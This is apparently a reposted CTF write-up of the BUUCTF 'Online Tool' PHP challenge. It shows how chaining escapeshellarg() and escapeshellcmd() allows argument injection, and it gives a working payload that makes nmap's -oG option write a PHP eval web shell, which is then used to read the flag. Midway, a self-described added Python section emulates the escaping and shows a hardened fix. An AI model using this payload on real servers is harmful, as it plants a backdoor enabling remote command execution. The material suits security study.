BUUCTF WEB [BUUCTF 2018]Online Tool
2022-04-23 12:27:00 【Y1Daa】
-
Opening the challenge environment shows the following source (the original is printed on a single line and is missing its closing brace; it is reflowed here):

<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if (!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin" . $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox ' . $sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F " . $host);
}
Here, escapeshellarg() encodes a string so that it can be used as a single argument in a shell command: every single quote in the string is escaped and surrounded by an extra pair of single quotes, and the whole result is wrapped in single quotes.

<?php
echo escapeshellarg("123");    // '123'
echo escapeshellarg("12' 3");  // '12'\'' 3'
?>

escapeshellcmd() escapes shell metacharacters: it inserts a \ before each special character and before any single quote that has no matching partner.

<?php
echo escapeshellcmd("123");     // 123
echo escapeshellcmd("12' 3");   // 12\' 3
echo escapeshellcmd("12'' 3");  // 12'' 3
?>

For the background on how this challenge is solved, see the article 谈谈escapeshellarg参数绕过和注入的问题 (lmxspace.com).
-
Because of these two filters, only one command can be executed. nmap, however, has several output options:

OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.

These write the command line and the scan results into a file.
-
Here we use the flaw that arises when escapeshellarg and escapeshellcmd are applied together to build a command-execution primitive:

?host=' <?php @eval($_POST["cmd"]);?> -oG shell.php '

The response is:

you are in sandbox ae49321bc77b6271cb2db4ba23d835f1
Starting Nmap 7.70 ( https://nmap.org ) at 2022-04-22 05:26 UTC
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
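The two function descriptions above, and the argument splitting that the escapeshellarg()-then-escapeshellcmd() chain produces, can be checked offline with the following Python emulation. This is an added example, not code from the original writeup or from the challenge: escapeshellarg() and escapeshellcmd() are re-implemented from their documented Unix behaviour, the inputs are the writeup's own `12' 3` and `123` plus a constructed hostname `example.com`, and the function names, the `-F` flag used as a stand-in for the full nmap command line, and the hostname allowlist regex are assumptions of the example. It also shows the hardened form: validate the host against an allowlist and pass it as a single argv element (or escapeshellarg() alone), which leaves nmap exactly one target argument.

```python
import re
import shlex

# Characters that PHP's escapeshellcmd() prefixes with a backslash on Unix
# (re-implemented here for illustration from the documented behaviour).
_CMD_META = set("#&;`|*?~<>^()[]{}$\\\n\xff")

# Hostname/IPv4 allowlist for the hardened variant. This regex is an
# assumption of the example; the challenge code performs no such validation.
_HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def escapeshellarg(s: str) -> str:
    """Emulate PHP escapeshellarg() on Unix: each ' becomes '\\'' and the
    whole string is wrapped in single quotes."""
    return "'" + s.replace("'", "'\\''") + "'"


def escapeshellcmd(s: str) -> str:
    """Emulate PHP escapeshellcmd() on Unix.

    Metacharacters get a backslash. A quote is escaped only when it has no
    partner of the same kind later in the string; paired quotes pass through.
    """
    out = []
    closing = None  # index of the quote that closes the currently open pair
    for i, c in enumerate(s):
        if c in ("'", '"'):
            if closing is None:
                partner = s.find(c, i + 1)
                if partner == -1:
                    out.append("\\")      # unpaired quote: escape it
                else:
                    closing = partner     # paired: remember where it closes
            elif closing == i:
                closing = None            # reached the closing partner
            else:
                out.append("\\")          # a different quote inside an open pair
            out.append(c)
        elif c in _CMD_META:
            out.append("\\" + c)
        else:
            out.append(c)
    return "".join(out)


def shell_argv(escaped_host: str) -> list:
    """Split the command the way /bin/sh would, to see how many arguments
    nmap actually receives ('-F' stands in for the challenge's flags)."""
    return shlex.split("nmap -F " + escaped_host)


def vulnerable_argv(host: str) -> list:
    """The challenge's pattern: escapeshellcmd(escapeshellarg(host)).
    The double escaping leaves a stray backslash and lets a space in the
    input terminate the quoted argument, so one host becomes several argv entries."""
    return shell_argv(escapeshellcmd(escapeshellarg(host)))


def arg_only_argv(host: str) -> list:
    """Correct quoting: escapeshellarg() alone always yields exactly one argument."""
    return shell_argv(escapeshellarg(host))


def is_valid_host(host: str) -> bool:
    """Allowlist check: hostname/IPv4 characters only and no leading '-',
    so neither quote breaking nor option injection is possible."""
    return _HOST_RE.fullmatch(host) is not None


def safe_scan_argv(host: str) -> list:
    """Hardened variant: validate, then build argv with no shell involved
    (the analogue of PHP's proc_open() with an array command in PHP 7.4+)."""
    if not is_valid_host(host):
        raise ValueError("invalid host")
    return ["nmap", "-F", host]


if __name__ == "__main__":
    bad = "12' 3"  # the writeup's own example input
    print("escapeshellarg :", escapeshellarg(bad))
    print("escapeshellcmd :", escapeshellcmd(bad))
    print("chained        :", escapeshellcmd(escapeshellarg(bad)))
    print("argv, chained  :", vulnerable_argv(bad))   # host split into two args
    print("argv, arg only :", arg_only_argv(bad))     # one argument, as intended
    print("argv, hardened :", safe_scan_argv("example.com"))
```

Running it shows `12' 3` arriving as two argv entries (`12\` and `3'`) after the chained escaping, but as the single argument `12' 3` when only escapeshellarg() is applied; the validator rejects the same input outright. The fix for code like the challenge's is therefore to drop the escapeshellcmd() call and validate the host, not to add more escaping.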
-
Connect with AntSword (蚁剑) and the flag file is found in the filesystem root:

flag{24d949bf-db37-41b9-9e74-9f9e202d0af7}
Copyright notice
This article was written by [Y1Daa]; when reposting, please include a link to the original. Thanks.
https://blog.csdn.net/weixin_51412071/article/details/124343895